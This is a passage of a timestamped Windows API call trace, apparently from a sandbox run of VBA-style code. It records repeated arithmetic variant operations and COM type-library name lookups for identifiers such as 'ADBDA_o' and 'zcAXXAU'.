pvarResult=0xaeff6b0) returned 0x0 [0069.568] VarCmp (pvarLeft=0xaefe448, pvarRight=0xaefe430, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.568] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe418, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.568] sqrt (_X=0x3) returned 0x41a0000000000000 [0069.568] VarDiv (in: pvarLeft=0xaefe3e8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.568] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.568] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.568] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe370, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.568] VarCmp (pvarLeft=0xaefe340, pvarRight=0xaefe328, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.568] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe310, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.568] sqrt (_X=0x3) returned 0x4190000000000000 [0069.568] VarDiv (in: pvarLeft=0xaefe2e0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.568] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.568] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.568] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe268, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.568] VarCmp (pvarLeft=0xaefe238, pvarRight=0xaefe220, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.568] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe208, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.568] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.568] VarDiv (in: pvarLeft=0xaefe1d8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.569] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.569] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.569] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe160, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.569] VarCmp (pvarLeft=0xaefe118, pvarRight=0xaefe100, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.569] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe0e8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.569] sqrt (_X=0x3) returned 0x41a0000000000000 [0069.569] VarDiv (in: pvarLeft=0xaefe0b8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.569] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.569] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.569] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe040, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.569] VarCmp (pvarLeft=0xaefe010, pvarRight=0xaefdff8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.569] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdfe0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.569] sqrt (_X=0x3) returned 0x41a0000000000000 [0069.569] VarDiv (in: pvarLeft=0xaefdfb0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.569] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.569] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.569] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdf38, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.569] VarCmp (pvarLeft=0xaefdef0, pvarRight=0xaefded8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.569] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdec0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.569] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.569] VarDiv (in: pvarLeft=0xaefde90, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.569] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.569] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.569] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefde18, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.569] VarCmp (pvarLeft=0xaefdde8, pvarRight=0xaefddd0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.569] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefddb8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.570] sqrt (_X=0x3) returned 0x4120000000000000 [0069.570] VarDiv (in: pvarLeft=0xaefdd88, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.570] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.570] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.570] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdd10, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.570] VarCmp (pvarLeft=0xaefdce0, pvarRight=0xaefdcc8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.570] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdcb0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.570] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.570] VarDiv (in: pvarLeft=0xaefdc80, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.570] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.570] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.570] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdc08, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.570] VarCmp (pvarLeft=0xaefdbc0, pvarRight=0xaefdba8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.570] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdb90, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.570] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.570] VarDiv (in: pvarLeft=0xaefdb60, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.570] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.570] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.570] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdae8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.570] VarCmp (pvarLeft=0xaefdab8, pvarRight=0xaefdaa0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.570] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefda88, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.570] sqrt (_X=0x3) returned 0x4160000000000000 [0069.570] VarDiv (in: pvarLeft=0xaefda58, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.570] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.570] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.570] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd9e0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.570] VarCmp (pvarLeft=0xaefd998, pvarRight=0xaefd980, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.571] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd968, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.571] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.571] VarDiv (in: pvarLeft=0xaefd938, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.571] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.571] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.571] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd8c0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.571] VarCmp (pvarLeft=0xaefd890, pvarRight=0xaefd878, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.571] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd860, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.571] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.571] VarDiv (in: pvarLeft=0xaefd830, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.571] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.571] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.571] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd7b8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.571] VarCmp (pvarLeft=0xaefd770, pvarRight=0xaefd758, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.571] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd740, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.571] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.571] VarDiv (in: pvarLeft=0xaefd710, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.571] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.571] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.571] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd698, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.571] VarCmp (pvarLeft=0xaefd668, pvarRight=0xaefd650, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.571] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd638, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.571] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.571] VarDiv (in: pvarLeft=0xaefd608, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.571] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.571] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.571] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd590, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.572] VarAdd (in: pvarLeft=0xaeff240, pvarRight=0xaefef10, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.572] VarAdd (in: pvarLeft=0xaeff6b0, pvarRight=0xaefece8, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.572] VarAdd (in: pvarLeft=0xaeff620, pvarRight=0xaefe9b8, pvarResult=0xaeff5f0 | out: pvarResult=0xaeff5f0) returned 0x0 [0069.572] VarAdd (in: pvarLeft=0xaeff5f0, pvarRight=0xaefe790, pvarResult=0xaeff590 | out: pvarResult=0xaeff590) returned 0x0 [0069.572] VarAdd (in: pvarLeft=0xaeff590, pvarRight=0xaefe460, pvarResult=0xaeff560 | out: pvarResult=0xaeff560) returned 0x0 [0069.572] VarAdd (in: pvarLeft=0xaeff560, pvarRight=0xaefe130, pvarResult=0xaeff518 | out: pvarResult=0xaeff518) returned 0x0 [0069.572] VarAdd (in: pvarLeft=0xaeff518, pvarRight=0xaefdf08, pvarResult=0xaeff500 | out: pvarResult=0xaeff500) returned 0x0 [0069.572] VarAdd (in: pvarLeft=0xaeff500, pvarRight=0xaefdbd8, pvarResult=0xaeff4e8 | out: pvarResult=0xaeff4e8) returned 0x0 [0069.572] VarAdd (in: pvarLeft=0xaeff4e8, pvarRight=0xaefd9b0, pvarResult=0xaeff4b8 | out: pvarResult=0xaeff4b8) returned 0x0 [0069.572] VarAdd (in: pvarLeft=0xaeff4b8, pvarRight=0xaefd788, pvarResult=0xaeff488 | out: pvarResult=0xaeff488) returned 0x0 [0069.572] VarAdd (in: pvarLeft=0xaeff488, pvarRight=0xaefd560, pvarResult=0xaeff470 | out: pvarResult=0xaeff470) returned 0x0 [0069.572] VarAdd (in: pvarLeft=0xaeffe68, pvarRight=0xaeffe38, pvarResult=0xaeffe08 | out: pvarResult=0xaeffe08) returned 0x0 [0069.572] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ADBDA_o", lHashVal=0x10bebf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81012, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ADBDA_o") returned 8 [0069.572] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ADBDA_o", lHashVal=0x10bebf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81012, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ADBDA_o") returned 8 [0069.572] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ADBDA_o", lHashVal=0x10bebf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.573] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ADBDA_o") returned 0x10bebf [0069.573] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="ADBDA_o" | out: _Dst="ADBDA_o") returned 0x0 [0069.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="ADBDA_o") returned 8 [0069.573] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.573] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ADBDA_o", lHashVal=0x10bebf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.573] IUnknown:Release (This=0x665ba50) returned 0xd [0069.573] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.573] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ADBDA_o", lHashVal=0x10bebf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.573] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.573] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.573] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ADBDA_o", lHashVal=0x10bebf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.573] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.573] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.573] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ADBDA_o", lHashVal=0x10bebf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.573] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81012, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ADBDA_o") returned 8 [0069.573] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ADBDA_o", lHashVal=0x10bebf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.573] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.573] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81012 | out: _Dst=0x67c2d40) returned 0x0 [0069.573] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ADBDA_o") returned 0x10b2c2 [0069.573] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_ADBDA_o" | out: _Dst="_B_var_ADBDA_o") returned 0x0 [0069.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_ADBDA_o") returned 15 [0069.573] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.573] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ADBDA_o", lHashVal=0x10b2c2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.573] IUnknown:Release (This=0x665ba50) returned 0xd [0069.573] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.573] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ADBDA_o", lHashVal=0x10b2c2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.574] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.574] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.574] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ADBDA_o", lHashVal=0x10b2c2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.574] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.574] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.574] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ADBDA_o", lHashVal=0x10b2c2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.574] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.574] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.574] IUnknown:Release (This=0x665ba50) returned 0xd [0069.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87016e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_ADBDA_o") returned 15 [0069.574] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ADBDA_o", lHashVal=0x10b2c2, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.574] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81012 | out: _Dst=0x144ec0) returned 0x0 [0069.574] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zcAXXAU", lHashVal=0x10111f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8103a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="zcAXXAU") returned 8 [0069.574] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zcAXXAU", lHashVal=0x10111f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8103a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="zcAXXAU") returned 8 [0069.574] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zcAXXAU", lHashVal=0x10111f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.574] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zcAXXAU") returned 0x10111f [0069.574] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="zcAXXAU" | out: _Dst="zcAXXAU") returned 0x0 [0069.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="zcAXXAU") returned 8 [0069.574] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.574] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zcAXXAU", lHashVal=0x10111f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.575] IUnknown:Release (This=0x665ba50) returned 0xd [0069.575] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.575] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zcAXXAU", lHashVal=0x10111f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.575] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.575] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.575] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zcAXXAU", lHashVal=0x10111f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.575] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.575] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.575] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zcAXXAU", lHashVal=0x10111f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.575] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8103a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="zcAXXAU") returned 8 [0069.575] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zcAXXAU", lHashVal=0x10111f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.575] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.575] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8103a | out: _Dst=0x67c2d40) returned 0x0 [0069.575] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zcAXXAU") returned 0x100522 [0069.575] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_zcAXXAU" | out: _Dst="_B_var_zcAXXAU") returned 0x0 [0069.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_zcAXXAU") returned 15 [0069.575] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.575] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zcAXXAU", lHashVal=0x100522, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.575] IUnknown:Release (This=0x665ba50) returned 0xd 